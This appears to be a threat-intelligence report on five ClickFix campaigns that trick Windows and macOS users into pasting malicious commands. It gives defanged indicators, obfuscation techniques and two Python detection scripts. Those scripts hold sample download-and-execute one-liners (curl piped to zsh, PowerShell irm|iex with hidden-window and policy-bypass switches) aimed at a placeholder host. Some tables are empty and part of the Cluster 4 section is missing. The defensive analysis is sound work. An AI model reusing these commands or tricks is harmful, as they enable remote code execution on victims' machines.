National Cyber Warfare Foundation (NCWF)

ClickFix Campaigns Targeting Windows and macOS


2026-03-25 08:57:04
milo
Blue Team (CND)
Insikt Group reveals five ClickFix social engineering clusters (QuickBooks, Booking.com, Birdeye, and two others) targeting Windows and macOS. Learn how threat actors abuse native system tools with malicious, obfuscated commands to gain initial access, and get key mitigations for defense.

Executive Summary


Insikt Group identified five distinct clusters leveraging the ClickFix social engineering technique to facilitate initial access to host systems. Observed since at least May 2024, these clusters include those impersonating financial application Intuit QuickBooks and the travel agency Booking.com. Insikt Group leveraged the Recorded Future® HTML Content Analysis dataset, which enables systematic monitoring of embedded web artifacts to identify and track new malicious domains and infrastructure.


The clusters demonstrate significant operational variance in lure themes and infrastructure patterns, and highlight the technique's evolution: lures have moved past simple verification prompts to a variety of fake challenges, and some clusters add operating system detection to tailor the execution chain to the victim's platform. Despite these differences, the underlying operation is largely the same, showing that ClickFix's core technique works across platforms and only the social engineering lure needs to be adapted to the victim. Threat actors manipulate victims into executing malicious, obfuscated commands directly within native system tools like the Windows Run dialog box or the macOS Terminal.


This living-off-the-land (LotL) approach allows malicious scripts to execute in memory, effectively bypassing traditional browser security and endpoint controls. Parallel clusters targeting sectors as diverse as accounting, real estate, and legal services indicate that ClickFix has become a standardized, high-ROI template for both cybercriminal and potentially advanced persistent threat (APT) groups.


To protect against these threats, security defenders should move beyond simple indicator blocking and prioritize aggressive behavioral hardening. Key recommendations include disabling the Windows Run dialog box via Group Policy Objects (GPO), implementing PowerShell Constrained Language Mode (CLM), and operationalizing Digital Risk Prevention tools such as Recorded Future's Malicious Websites to identify and mitigate threats to your digital assets.


Based on increasing use since 2024, Insikt Group assesses that the ClickFix methodology will very likely remain a primary initial access vector throughout 2026 as threat actors continue to social engineer victims to enable exploitation. Looking ahead, Insikt Group anticipates ClickFix lures will become increasingly technically adaptive, incorporating more selective browser fingerprinting, while continuing to use infrastructure that can be built and dismantled quickly. In addition to technical refinements, Insikt Group predicts that the social engineering component will continue to evolve, leveraging new techniques to lure victims into executing malicious commands.


Key Findings



  • Insikt Group identified and tracked five distinct ClickFix activity clusters exhibiting significant operational variance in lure themes and infrastructure patterns despite a shared reliance on fraudulent human-verification lures. This indicates that the ClickFix methodology has transitioned into a standardized, high-ROI template adopted across a fragmented ecosystem of threat actors.

  • While visually diverse, all analyzed clusters use a consistent execution framework that bypasses traditional browser security controls by shifting the point of exploitation to user-assisted manual commands. These campaigns target a wide variety of sectors, including accounting (QuickBooks), travel (Booking.com), and macOS users via fake system optimization prompts.

  • ClickFix technical execution follows a standardized four-stage pattern: input of highly encoded or fragmented strings, native execution via legitimate system shells and living-off-the-land binaries (LOLBins), remote ingress from threat actor-controlled infrastructure, and immediate in-memory execution. This methodology allows threat actors to stage and run remote code with limited and short-lived forensic artifacts on the host system.


Background


First documented in late 2023, ClickFix has transitioned from a niche social engineering tactic to a cornerstone of the global cybercriminal ecosystem. ClickFix is a social engineering methodology that lures victims into manually executing malicious commands by masquerading as a necessary technical resolution for fabricated system errors or human-verification prompts. This technique represents an evolutionary shift from the FakeUpdates (SocGholish) model, prioritizing manual user intervention to evade the increasingly robust security features of modern web browsers and automated endpoint detection systems. In this context, the methodology embodies a "think smart, not hard" approach. The simplicity of relying on a manual user action makes it a potent defensive evasion tactic: bypassing typical browser-based security makes it difficult to detect, while the high number of threat actors using it makes it difficult to track across a fragmented threat landscape.


The technical core of the methodology relies primarily on pastejacking, where background JavaScript populates a victim's clipboard with an obfuscated command while they are distracted by visual lures such as fraudulent reCAPTCHA or Cloudflare Turnstile overlays. In some instances, the malicious command is not placed on the clipboard automatically; instead, victims are manipulated into copying and running the command manually. By leveraging a living-off-the-land (LotL) approach, threat actors manipulate users into executing these commands directly within trusted system tools like the Windows Run dialog box, PowerShell, or the macOS Terminal. This user-assisted execution allows malicious scripts to execute silently and bypass traditional browser and endpoint security perimeters.


ClickFix has been weaponized by a diverse spectrum of threat actors, ranging from high-volume initial access brokers (IABs) to sophisticated state-sponsored groups such as BlueDelta (aka APT28) and the North Korean group PurpleBravo. The methodology enables a repeatable and scalable delivery framework capable of deploying a wide variety of secondary payloads, including infostealers like Lumma Stealer, Vidar, and Odyssey Stealer, or remote access trojans (RATs) such as NetSupport RAT. These operations are frequently supported by highly adaptive, disposable infrastructure designed to maintain operational continuity even as individual domains are identified and blocked.


Technical Analysis


Insikt Group identified and tracked five emerging ClickFix clusters by leveraging the Recorded Future HTML Content Analysis dataset, which enables the systematic monitoring of embedded web artifacts. By pivoting on unique technical identifiers, including specific Document Object Model (DOM) hashes, hard-coded image source tags, and unique page titles, Insikt Group mapped each cluster's infrastructure, surfaced newly active malicious domains, and monitored the clusters' evolution in near real time.


Across the analyzed clusters, Insikt Group detailed the ClickFix commands victims were manipulated into executing on their systems. These commands relied heavily on LOLBins: native, legitimately signed executables that threat actors use to fetch and run malicious payloads on a victim's machine. Depending on how a personal machine or corporate endpoint is configured, this approach can evade detections that implicitly trust signed, built-in binaries.


ClickFix Clusters


Insikt Group identified five clusters (see Figure 1) that exhibited significant operational variance despite a shared reliance on the ClickFix social engineering technique. These clusters were defined by their infrastructure patterns and targeting approaches, ranging from logistics-themed lures to dual-platform selection logic. This indicates that the ClickFix methodology is being deployed across a fragmented ecosystem of threat actors, each tailoring the technique to suit their own delivery requirements and victim profiles.


These clusters were grouped based on observable patterns in infrastructure reuse, lure formatting, platform targeting, and operational adjustments over time. While core technical elements and delivery mechanisms overlap, each cluster maintained a distinct footprint within the broader landscape. Insikt Group categorized the activity into the following five clusters:



  • Intuit QuickBooks: Targeted impersonation of accounting software, often leveraging aged domains to bypass security filters

  • Booking.com: Used fraudulent domains to present fake verification portals

  • Birdeye: A large-scale cluster that lures users of the AI marketing company Birdeye by spoofing domains and manipulating victims into running a malicious command that delivers NetSupport RAT

  • Dual-Platform Selection: Used operating system detection to deliver platform-tailored lures and malware

  • macOS Storage Cleaning: Used counterfeit prompts mimicking macOS system optimization to trick users into executing encoded terminal commands


Figure 1: Overview of ClickFix and associated clusters (Source: Recorded Future)



Cluster 1: Intuit QuickBooks


Cluster 1 was observed operating from January 2026 to the time of writing, primarily targeting organizations through social engineering lures impersonating the accounting software Intuit QuickBooks. QuickBooks is widely used for tax preparation in the United States; given the campaign's active window coincides with the US tax season (typically January through April 15), Insikt Group assesses with moderate confidence that the timing was a calculated effort to target entities engaged in financial reporting. Although this cluster recently pivoted to targeting users of the US real estate marketplace Zillow, QuickBooks-related artifacts and brand-specific imagery remain deeply embedded throughout the Document Object Model (DOM) of the malicious landing pages.


Cluster 1 Profile


Figure 2: Overview of ClickFix Cluster 1 — Intuit QuickBooks (Source: Recorded Future)


Table 1: PowerShell commands observed across Cluster 1



Cluster 1 Infection Chain


The infection chain begins when a victim lands on a ClickFix landing page. The page presents a fraudulent human-verification interface (see Figure 3) that instructs the victim to complete specific "verification" steps.


Figure 3: Intuit QuickBooks-themed ClickFix page (Source: Recorded Future Web Scans)



By interacting with the page, the victim unknowingly copies a malicious command to the system clipboard. Execution then typically occurs through native system utilities such as the Windows Run dialog and PowerShell, leveraging LOLBins to evade traditional browser and endpoint-based security controls.


Upon pasting the command, an obfuscated PowerShell script (Figure 4) executes in a hidden window. This stager uses self-referential function names to dynamically construct and invoke Invoke-RestMethod to the domain nobovcs[.]com.


Figure 4: Obfuscated PowerShell command executed in a hidden window, dynamically reconstructing and invoking code via iex (Source: Recorded Future)



This request triggers the retrieval of a short PowerShell stager (see Figure 5) that downloads a second-stage payload, bibi.php, saving it to the %TEMP% directory as script.ps1. This stager is the initial execution step that kicks off the NetSupport RAT installation.


Figure 5: Stager script to download second-stage script, bibi.php (Source: Recorded Future)



The bibi.php script is essential for the final deployment phase and for obfuscating on-disk artifacts. It contains a function called Get-RomanticName, which selects and combines strings from a thematic wordlist, including terms such as "Heart", "Soul", and "Desire", to generate a randomized folder name under %LOCALAPPDATA%, where the staging files are placed.


The script retrieves four primary files from nobovcs[.]com, detailed in Table 2.




Filename | SHA-256
at.7z | c0af6e9d848ada3839811bf33eeb982e6c207e4c40010418e0185283cd5cff50
lnk.7z | 5d821db386c7c879caeabf3e9f94c94a48eec6ec5a3a0efbae9d69da3f52c1db
7z.exe | 43907e54cf3d1258f695d1112759b5457576481072cc76a679b8477cfeb3db87
7z.dll | b17c3e4058aacdcc36b18858d128d6b3058e0ea607a4dc59eb95b18b7c6acc7c



Table 2: Filenames and SHA256 hashes of the files downloaded from nobovcs[.]com (Source: Recorded Future)


The script uses 7z.exe to extract at.7z (protected by the password “pppp”), which contains the NetSupport RAT binary, neservice.exe. Persistence is established by hijacking Startup shortcuts; if no existing shortcut is detected, the script extracts lnk.7z to the Startup folder to ensure the payload launches automatically upon system reboot.


Following successful execution, the binary neservice.exe performs an HTTP GET request to gologpoint[.]com to initiate command-and-control (C2) communications. gologpoint[.]com resolves to the IP address 62[.]164[.]177[.]230.


Cluster 2: Booking.com


Cluster 2 was observed operating from February 2026 to the time of writing, impersonating the travel agency Booking.com. Insikt Group tracked the cluster by pivoting on a unique DOM hash made possible by the threat actor’s repeated use of a unique HTML title and consistent image files. Indicators of compromise (IoCs) tagged in this cluster can be seen in the Recorded Future HTML Content Analysis. The landing pages for this cluster use a counterfeit reCAPTCHA v2 challenge, requiring victims to select all photos containing a "bucket" (Figure 6). Insikt Group observed that the same challenge photos are presented in the same order across all analyzed pages.





Cluster 2 Profile


Figure 7: Overview of ClickFix Cluster 2 — Booking.com (Source: Recorded Future)


Table 3: PowerShell commands observed across Cluster 2



Cluster 2 Infection Chain


The process begins when a victim interacts with the fake challenge. Upon completing the challenge, the victim is redirected to a verification page where a malicious PowerShell command (see Figure 8) is copied to the system clipboard. Instructions on the verification page manipulate the victim into opening the Windows Run dialog box and entering the command. Executing this malicious command starts the infection chain for NetSupport RAT.


Figure 8: Command from the booking campaign that reaches out to the payload server (Source: Recorded Future)



The PowerShell command provided in script.ps1 (see Figure 9) runs with the -NoProfile and -ExecutionPolicy Bypass switches: the former skips the user and machine profile scripts, and the latter overrides the configured script execution policy (a safety setting rather than a security boundary) so that the downloaded script is not blocked. Following execution, the system pulls four staging files into a directory named DesireSpark Serenade. This directory naming convention is functionally identical to the "romantic" naming methodology observed in Cluster 1.


Figure 9: DOM file from checkpulse[.]com that details the command to be run on the victim machine, suppressing the protections normally in place in order to pull down and execute the PowerShell command (Source: Recorded Future)



The primary staging mechanism relies on script.ps1 to pull secondary payloads from the staging server. In one analyzed instance, scripts originating from thestayreserve[.]com reached out to checkpulses[.]com to retrieve the files detailed in Table 4.




Filename | SHA-256
at.7z | 397dcea810f733494dbe307c91286d08f87f64aebbee787706fe6561ed3e20f8
lnk.7z | 5d821db386c7c879caeabf3e9f94c94a48eec6ec5a3a0efbae9d69da3f52c1db
7z.exe | 43907e54cf3d1258f695d1112759b5457576481072cc76a679b8477cfeb3db87
7z.dll | b17c3e4058aacdcc36b18858d128d6b3058e0ea607a4dc59eb95b18b7c6acc7c



Table 4: Filenames and SHA256 hashes of the files downloaded from checkpulses[.]com (Source: Recorded Future)


The 7z.exe utility is used to extract at.7z, which contains the NetSupport RAT binary neservice.exe. Persistence is established by adding a link to the system Startup folder.


The domains observed across this cluster use a similar PowerShell command pattern. However, once the command is executed, the infection chain varies slightly in the staging infrastructure being called. In the case of the sign-in-op-token[.]com and thestayreserve[.]com domains, the malicious command is identical in pattern and organization, but the hard-coded dropper domain is bkng-updt[.]com and checkpulses[.]com, respectively.


While staging domains vary, the final payloads across this cluster converge on the same NetSupport RAT C2 infrastructure (Table 5).




ClickFix Domain | IP Address | Dropper (IP) | NetSupport RAT C2 (IP)
sign-in-op-token[.]com | 91[.]202[.]233[.]206 | bkng-updt[.]com (77[.]91[.]65[.]144) | hotelupdatesys[.]com (152[.]89[.]244[.]70)
thestayreserve[.]com | 91[.]202[.]233[.]206 | checkpulses[.]com (77[.]91[.]65[.]31) | chrm-srv[.]com, ms-scedg[.]com (152[.]89[.]244[.]70)

Table 5: IoCs observed in the Booking.com infection chain (Source: Recorded Future)


Following installation, the malware delivered via thestayreserve[.]com initiates communication (Figure 10) with chrm-srv[.]com and ms-scedg[.]com, both of which resolve to 152[.]89[.]244[.]70. The domain hotelupdatesys[.]com, listed in Table 5 for the sign-in-op-token[.]com chain, resolves to the same IP address.


Figure 10: POST request from sign-in-op-token[.]com showing NetSupport interaction (Source: Recorded Future)



Cluster 3: Birdeye


Cluster 3 was observed operating from May 2024 until the time of writing. Previously reported on by Insikt Group, this cluster uses infrastructure centered on domains incorporating the keyword "bird" to deliver its ClickFix lure pages, trackable in Recorded Future’s HTML Content Analysis. These lures spoof Birdeye, an AI marketing company, to manipulate victims into executing malicious commands.


Cluster 3 Profile


Figure 11: Overview of ClickFix Cluster 3 — Birdeye (Source: Recorded Future)


Table 6: PowerShell command observed across Cluster 3



Cluster 3 Infection Chain


The infection chain begins when a victim visits a compromised site and is presented with a Cloudflare-style CAPTCHA challenge. Upon interacting with the page, the victim is prompted to run a command in the Windows Run dialog box. Insikt Group identified this cluster by pivoting on unique technical identifiers within the HTML artifacts, including a consistent and unique page title and a static image used across the infrastructure.


The command the victim is manipulated into running causes the victim’s device to reach out to alababababa[.]cloud to download a payload from hxxps[://]alababababa[.]cloud/cVGvQio6[.]txt. To further reduce suspicion, once the malicious command is executed, the victim is redirected to the legitimate birdeye.com website (see Figure 12).


Figure 12: The redirect to the legitimate Birdeye website (Source: Recorded Future)



Analysis of the JavaScript within the DOM for this cluster, provided in Appendix F, revealed insights into the threat actor's methods. A notable portion of the script uses seven obfuscated lines that are concatenated into a single string and written to the victim's clipboard. The developer left comments in the code that spell out the deobfuscated purpose of each line; for example, one comment explicitly identifies the portion of the command that calls PowerShell with specific flags (Figure 13).


Figure 13: Portion of JavaScript containing threat actor comments (Source: Recorded Future)



Furthermore, a comment written in Cyrillic at the beginning of the script translates to, "This should help bypass Cloudflare static analysis". This internal documentation suggests the threat actor is purposefully detailing their actions to refine bypass techniques against security scanners.


Historically, alababababa[.]cloud has been associated with the delivery of multiple malware strains, including Lumma Stealer and RedLine Stealer. The large volume of domains identified in this cluster, exceeding 40 unique entries, highlights the scale of the "run and repeat" model used to sustain this activity.


Cluster 4: Dual-Platform Selection


Cluster 4 was observed operating from March 2025 to the time of writing. This cluster is unique for its use of operating system detection to deliver tailored ClickFix lures for both Windows and macOS users. Unlike standard ClickFix behavior that typically pushes commands to the clipboard automatically, this variant provides detailed manual instructions, requiring the victim to open native system tools and manually copy and paste the provided staging payload. One of the ClickFix pages used to analyze this behavior was macosapp-apple[.]com, hosted at IP address 45[.]144[.]233[.]192.


Cluster 4 Profile


Figure 14: Overview of ClickFix Cluster 4 — Dual-Platform Selection (Source: Recorded Future)


Table 7: Encoded commands observed across Cluster 4



Cluster 4 Infection Chain


The infection chain begins when a victim lands on a ClickFix page that instructs them to verify they are human (Figure 15).


Figure 15: ClickFix page identified in Cluster 4 (Source: Recorded Future Web Scans)


Cluster 5: macOS Storage Cleaning


Figure 23: Landing page for mac-os-helper[.]com (Source: Recorded Future)



Once the Terminal is open, the victim is prompted to execute a multi-stage command that purportedly "finds and removes temporary system files".


In reality, these commands (see Table 9) use different encoding layers to hide their intent: the first example decodes a hexadecimal string to reveal a Base64-encoded curl command, while the second directly decodes a Base64 string into an executable command. Both methods defeat simple pattern matching by keeping the malicious payload obfuscated until the moment of execution.


Table 9: Encoded and obfuscated ClickFix commands for macOS (Source: Recorded Future)



As shown in Table 10, the revealed curl instruction uses a bundled set of short options, in this cluster -kfsSL, to facilitate silent delivery: -k disables TLS certificate verification, -f makes curl output nothing on HTTP errors (so no server error page is piped into the shell), -s hides the progress meter, -S still prints errors despite -s, and -L follows redirects to reach the final payload domain.


Table 10: Decoded and deobfuscated ClickFix commands for macOS (Source: Recorded Future)



Based on historic evidence (1, 2) and forensic patterns, Insikt Group assesses with high confidence that the information stealer MacSync was the primary payload used to infect victims in this cluster. The malicious commands on these pages caused the infected systems to reach out to a specific set of staging and C2 infrastructure, detailed in Table 11. Notably, while the domains varied, they were frequently observed behind Cloudflare to complicate network-level blocking.




Indicator | IP Address | ASN | First Seen | Last Seen
octopox[.]com | Cloudflare | Cloudflare | 2026-02-06 | 2026-03-05
joeyapple[.]com | Cloudflare | Cloudflare | 2026-02-04 | 2026-03-05



Table 11: C2 servers identified for the macOS cleaner campaign (Source: Recorded Future)


Copy Command Analysis


Insikt Group analyzed commands across the five clusters identified in this research. While the visual lures and impersonated brands vary between groups like Cluster 1 (Intuit QuickBooks) and Cluster 5 (macOS Storage Cleaning), the underlying execution logic remains consistent. This "run and repeat" methodology relies on a narrow set of trusted LOLBins and lightweight obfuscation to stage remote code with minimal forensic artifacts.


The technical implementation of ClickFix follows a standardized four-stage pattern across all target operating systems, as summarized in Table 12.




  • Obfuscated Input. Action: input of highly encoded or fragmented strings. Technical intent: bypass static analysis and signature-based detection.

  • Native Execution. Action: leveraging trusted system shells (zsh, bash, or powershell.exe). Technical intent: execute the initial stager using legitimate system binaries.

  • Remote Ingress. Action: initiation of external requests to threat actor-controlled IPs or domains. Technical intent: download secondary scripts or payloads from the staging infrastructure.

  • In-Memory Execution. Action: piping downloaded content directly into an interpreter. Technical intent: ensure no malicious files are initially saved to disk, evading endpoint security.



Table 12: Standardized four-stage ClickFix execution pattern (Source: Recorded Future)


Insikt Group identified two primary command styles used in macOS-centric campaigns, such as Cluster 4 and Cluster 5, which are detailed in Table 13.




  • Multi-Stage Encoding. Observed pattern: Hex -> Base64 -> zsh. Defender insight: xxd -r -p in a user-initiated command is a significant indicator of malicious intent, as it is rarely used in legitimate troubleshooting.

  • Persistence and Backgrounding. Observed pattern: use of nohup and the & operator. Defender insight: the malicious process keeps running in the background after the user closes the Terminal, keeping the stager alive during staging. Note that nohup only makes the process ignore SIGHUP; it provides no reboot persistence, so any persistence across restarts has to be established separately.



Table 13: Observed tactics, techniques, and procedures (TTPs) for macOS and Linux (zsh and bash) commands (Source: Recorded Future)
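The layered macOS commands described for Cluster 5 (a hex string that decodes to Base64 that decodes to a shell command) and the xxd / nohup indicators in Table 13 can be triaged without ever running them. The following is an added example, not Insikt Group's tooling: it statically peels the echo | xxd -r -p | base64 -d | zsh layers, expands the curl short options so the -kfsSL bundle is readable, pulls out the payload URL and background markers, and maps the result onto the four-stage pattern in Table 12. The sample commands are constructed for this example and the URL example.invalid is a placeholder, not an indicator from the report.

```python
import base64
import re
import shlex

# Constructed samples modelled on the two macOS command styles described above:
# hex -> base64 -> zsh, and a direct base64 -> sh. The URL is a placeholder
# (example.invalid), not an indicator from the report.
INNER_CMD = "nohup curl -kfsSL https://example.invalid/p.txt | zsh &"
_B64 = base64.b64encode(INNER_CMD.encode()).decode()
SAMPLE_HEX_LAYERED = f"echo {_B64.encode().hex()} | xxd -r -p | base64 -d | zsh"
SAMPLE_B64_LAYERED = f"echo {_B64} | base64 -d | sh"

# curl(1) single-letter options that make up the observed -kfsSL bundle
CURL_FLAGS = {
    "k": "--insecure: skip TLS certificate verification",
    "f": "--fail: output nothing on HTTP errors, so no error page reaches the shell",
    "s": "--silent: hide the progress meter",
    "S": "--show-error: still print errors while silent",
    "L": "--location: follow redirects to the final payload host",
}
SHELLS = {"zsh", "bash", "sh"}
ECHO_PIPE = re.compile(r"\s*echo\s+(?:-n\s+)?['\"]?([A-Za-z0-9+/=]+)['\"]?\s*\|(.*)$")


def peel_layers(cmd, max_depth=5):
    """Statically unwrap `echo <blob> | xxd -r -p | base64 -d | <shell>` chains.
    Returns (innermost command, ordered layer names). Nothing is executed."""
    layers = []
    for _ in range(max_depth):
        m = ECHO_PIPE.match(cmd)
        if not m:
            break
        data = m.group(1).encode()
        try:
            for stage in (s.strip() for s in m.group(2).split("|")):
                first = stage.split()[0] if stage else ""
                if re.fullmatch(r"xxd\s+-r\s+-p", stage):
                    data = bytes.fromhex(data.decode())
                    layers.append("hex")
                elif re.fullmatch(r"base64\s+(-d|-D|--decode)", stage):
                    data = base64.b64decode(data)
                    layers.append("base64")
                elif first in SHELLS:
                    layers.append("pipe-to-" + first)
                else:
                    return cmd, layers  # unknown stage: stop rather than guess
        except ValueError:  # malformed hex or base64
            return cmd, layers
        cmd = data.decode(errors="replace")
    return cmd, layers


def triage(cmd):
    """Peel the encoding layers, then pull out what a defender needs from the inner command."""
    inner, layers = peel_layers(cmd)
    try:
        toks = shlex.split(inner)
    except ValueError:
        toks = inner.split()
    out = {
        "layers": layers,
        "inner": inner,
        "curl_flags": {},
        "url": None,
        "backgrounded": "nohup" in toks or any(t.endswith("&") for t in toks),
        "pipes_to_shell": any(l.startswith("pipe-to-") for l in layers),
    }
    if "curl" in toks:
        for t in toks[toks.index("curl") + 1:]:
            if t == "|":
                break
            if t.startswith("-") and not t.startswith("--"):  # bundled short options
                out["curl_flags"].update({c: CURL_FLAGS.get(c, "unknown") for c in t[1:]})
            elif re.match(r"https?://", t):
                out["url"] = t
    for a, b in zip(toks, toks[1:]):
        if a == "|" and b in SHELLS:
            out["pipes_to_shell"] = True
    return out


def stages(t):
    """Map triage output onto the four-stage pattern from Table 12."""
    hit = []
    if t["layers"]:
        hit.append("Obfuscated Input")
    if t["pipes_to_shell"]:
        hit.append("Native Execution")
    if t["url"]:
        hit.append("Remote Ingress")
    if t["url"] and t["pipes_to_shell"]:
        hit.append("In-Memory Execution")
    return hit


if __name__ == "__main__":
    for sample in (SAMPLE_HEX_LAYERED, SAMPLE_B64_LAYERED):
        t = triage(sample)
        print(t["layers"], "->", t["inner"])
        print("  url:", t["url"], "| flags:", ", ".join(t["curl_flags"]), "| stages:", stages(t))
```

The decoder deliberately stops at any pipeline stage it does not recognise rather than guessing, so a novel layer shows up as a short layer list with an undecoded inner command, which is itself worth a look. Run it over the command strings recovered from a victim's shell history or from a ClickFix page's DOM to get the payload URL for blocking without detonating anything.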


Windows-based commands, particularly those observed in Cluster 1 and Cluster 2, exhibit a higher degree of sophistication through "Command Swizzling" and case randomization, as shown in Table 14.




  • Parameter Obfuscation. Observed pattern: randomized casing and shortened aliases (for example, -wINDoW MiNI, -wi mi, or -w h). Defender insight: powershell.exe matches switch names and enum values such as Hidden case-insensitively on any unambiguous prefix, so tools looking for the literal strings "Hidden" or "Minimized" miss these variants; normalize the command line before matching.

  • The "Golden" Pattern. Observed pattern: combining Invoke-RestMethod (irm) with Invoke-Expression (iex). Defender insight: this retrieves and executes remote code entirely in memory, and the combination is a high-fidelity hunting signature for ClickFix activity.

  • String Manipulation Deception. Observed pattern: using .Substring() or .Replace() to "build" commands. Defender insight: clusters like Cluster 1 avoid explicitly typing iex to bypass static signature detections.



Table 14: Observed TTPs for Windows (PowerShell) commands (Source: Recorded Future)
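Because powershell.exe accepts any unambiguous, case-insensitive prefix of its switch names and of enum values such as Hidden, the -wINDoW MiNI, -wi mi and -w h variants in Table 14 all mean the same thing, and a detector that keys on literal strings misses them. The following is an added example, not Insikt Group's tooling: it normalizes the host switches back to canonical names, decodes an -EncodedCommand body, and then looks for the irm|iex pattern, scriptblock or ampersand invocation, and the string-building obfuscation described above. The sample command lines are constructed and use example.invalid as a placeholder URL; the prefix table is transcribed from the Windows PowerShell console host and is an assumption for other hosts such as pwsh.

```python
import base64
import re

# powershell.exe host switches as (full name, shortest accepted prefix, canonical label).
# The Windows PowerShell console host matches a switch case-insensitively against any
# prefix of the full name at least as long as the shortest prefix, which is what
# "-wINDoW MiNI", "-wi mi" and "-w h" rely on. Transcribed from the public ConsoleHost
# parser; assumption: other hosts (pwsh) may differ.
HOST_SWITCHES = [
    ("noprofile", "nop", "NoProfile"), ("noninteractive", "noni", "NonInteractive"),
    ("nologo", "nol", "NoLogo"), ("noexit", "noe", "NoExit"),
    ("windowstyle", "w", "WindowStyle"),
    ("executionpolicy", "ex", "ExecutionPolicy"), ("ep", "ep", "ExecutionPolicy"),
    ("encodedcommand", "e", "EncodedCommand"), ("ec", "ec", "EncodedCommand"),
    ("command", "c", "Command"), ("file", "f", "File"),
    ("sta", "s", "Sta"), ("mta", "mta", "Mta"), ("version", "v", "Version"),
]
# Enum values are resolved by unique prefix as well, so "h" -> Hidden and "mi" -> Minimized.
WINDOW_STYLES = ["Normal", "Hidden", "Minimized", "Maximized"]
EXEC_POLICIES = ["Restricted", "AllSigned", "RemoteSigned", "Unrestricted", "Bypass", "Undefined"]
TAKES_VALUE = {"WindowStyle", "ExecutionPolicy", "EncodedCommand", "File", "Version"}

FETCH = re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|net\.webclient)\b", re.I)
EXEC = re.compile(r"\biex\b|\binvoke-expression\b|\[scriptblock\]::create|&\s*\(|&\s*\$\w+", re.I)
BUILD = re.compile(r"\.substring\(|\.replace\(|\[char\]|-join\b|['\"]\s*\+|\+\s*['\"]", re.I)
TOKEN = re.compile(r'"[^"]*"|\'[^\']*\'|\S+')

# Constructed sample command lines modelled on the patterns in Table 14; the URLs are
# placeholders (example.invalid), not indicators from the report.
SAMPLES = {
    "swizzled": 'powershell -wINDoW MiNI -nop -ep BypASs -c "iex (irm https://example.invalid/a)"',
    "scriptblock": 'powershell -w h -c "$u=\'https://example.invalid/b\';$r=(irm $u);& ([scriptblock]::Create($r))"',
    "stringbuild": 'powershell -wi mi -c "$a=\'Invoke-Ex\'+\'pression\';&$a (irm https://example.invalid/c)"',
    "encoded": "powershell -nop -w hidden -enc "
               + base64.b64encode("iex (irm https://example.invalid/d)".encode("utf-16-le")).decode(),
    "benign": r"powershell -NoProfile -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1",
}


def canon_switch(tok):
    """Map a typed switch such as -wINDoW or /nop to its canonical name, or None."""
    key = tok.lstrip("-/").lower()
    for full, shortest, canon in HOST_SWITCHES:
        if full.startswith(key) and len(key) >= len(shortest):
            return canon
    return None


def disambiguate(value, names):
    hits = [n for n in names if n.lower().startswith(value.lower())]
    return hits[0] if len(hits) == 1 else value  # ambiguous or unknown: keep as typed


def analyze(cmdline):
    toks = TOKEN.findall(cmdline)
    if toks and re.fullmatch(r"(.*[\\/])?(powershell|pwsh)(\.exe)?", toks[0], re.I):
        toks = toks[1:]
    params, body, i = {}, None, 0
    while i < len(toks):
        canon = canon_switch(toks[i]) if toks[i][0] in "-/" else None
        if canon == "Command":  # -Command swallows the rest of the line
            body = " ".join(toks[i + 1:]).strip()
            break
        if canon in TAKES_VALUE and i + 1 < len(toks):
            val = toks[i + 1]
            if canon == "WindowStyle":
                val = disambiguate(val, WINDOW_STYLES)
            elif canon == "ExecutionPolicy":
                val = disambiguate(val, EXEC_POLICIES)
            elif canon == "EncodedCommand":  # -enc carries UTF-16LE text in Base64
                try:
                    body = base64.b64decode(val).decode("utf-16-le")
                except (ValueError, UnicodeDecodeError):
                    body = None
            params[canon] = val
            i += 2
        else:
            params[canon or toks[i]] = True
            i += 1
    if body and len(body) > 1 and body[0] == body[-1] and body[0] in "\"'":
        body = body[1:-1]
    fetch = bool(body and FETCH.search(body))
    exe = bool(body and EXEC.search(body))
    build = bool(body and BUILD.search(body))
    hidden = params.get("WindowStyle") in ("Hidden", "Minimized")
    bypass = params.get("ExecutionPolicy") == "Bypass"
    if fetch and exe:
        verdict = "high"  # the irm|iex "golden pattern": remote code run in memory
    elif fetch or exe or build or (hidden and bypass):
        verdict = "medium"
    else:
        verdict = "low"
    return {"params": params, "body": body, "fetch": fetch, "exec": exe, "build": build,
            "hidden_window": hidden, "bypass_policy": bypass, "verdict": verdict}


if __name__ == "__main__":
    for name, line in SAMPLES.items():
        r = analyze(line)
        print(f"{name:12} verdict={r['verdict']:6} params={r['params']}")
```

The point of the normalization step is that a Sysmon or EDR process-creation event carries the command line exactly as the victim pasted it; feeding it through analyze() first lets one rule cover every casing and prefix the threat actor chooses. The regexes are deliberately heuristic, so treat "medium" as a hunting lead rather than an alert.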


Mitigations


To mitigate the threats posed by ClickFix social engineering and related living-off-the-land (LotL) techniques, Insikt Group recommends a defense-in-depth approach that combines proactive intelligence monitoring with aggressive hardening of native system utilities.



  • Operationalize HTML Content Analysis: Recorded Future customers should use the HTML Content Analysis source to monitor for impersonations of their brand, which are leveraged to deliver ClickFix. Leverage the Recorded Future Intelligence Operations Platform to monitor for unique web artifacts, such as specific Document Object Model (DOM) hashes and page titles, to identify new ClickFix domains in real time.

  • Use Recorded Future Threat Intelligence: Recorded Future customers can proactively mitigate this threat by operationalizing Recorded Future Intelligence Operations Platform data, specifically by leveraging continuously updated Risk Lists and by blocklisting IP addresses and domains associated with ClickFix to block communication with malicious infrastructure.

  • Monitor Malicious Infrastructure Risk Lists: Continuously update security information and event management (SIEM) and endpoint detection and response (EDR) tools with Recorded Future Risk Lists to block traffic to identified staging and command-and-control (C2) domains.

  • Use Malware Intelligence: Leverage the Recorded Future Intelligence Operations Platform to hunt for indicators of compromise (IoCs) associated with payloads identified in this report, such as NetSupport RAT, Odyssey Stealer, and Lumma Stealer.

  • Leverage Network Intelligence: Use Recorded Future Network Intelligence to detect exfiltration events early (such as those linked to NetSupport RAT), which can help prevent intrusions before they escalate. This approach relies on comprehensive, proactive infrastructure discovery provided by Insikt Group and the analysis of vast amounts of network traffic.

  • Use Identity Module: Recorded Future customers should leverage the Identity Module to monitor for credentials and passwords being sold on the dark web that have been stolen by information stealers.

  • Disable Windows Run Dialog via Group Policy Objects (GPOs): For corporate environments, disable the Win+R keyboard shortcut and the Run command in the Start menu via Group Policy Objects (GPOs); the "Remove Run menu from Start Menu" policy under User Configuration > Administrative Templates > Start Menu and Taskbar does both. This significantly hinders the ClickFix execution chain, as victims are typically instructed to paste malicious commands directly into this dialog box, although lures can fall back to directing victims into PowerShell or a Terminal, so this control should be paired with the execution restrictions below.

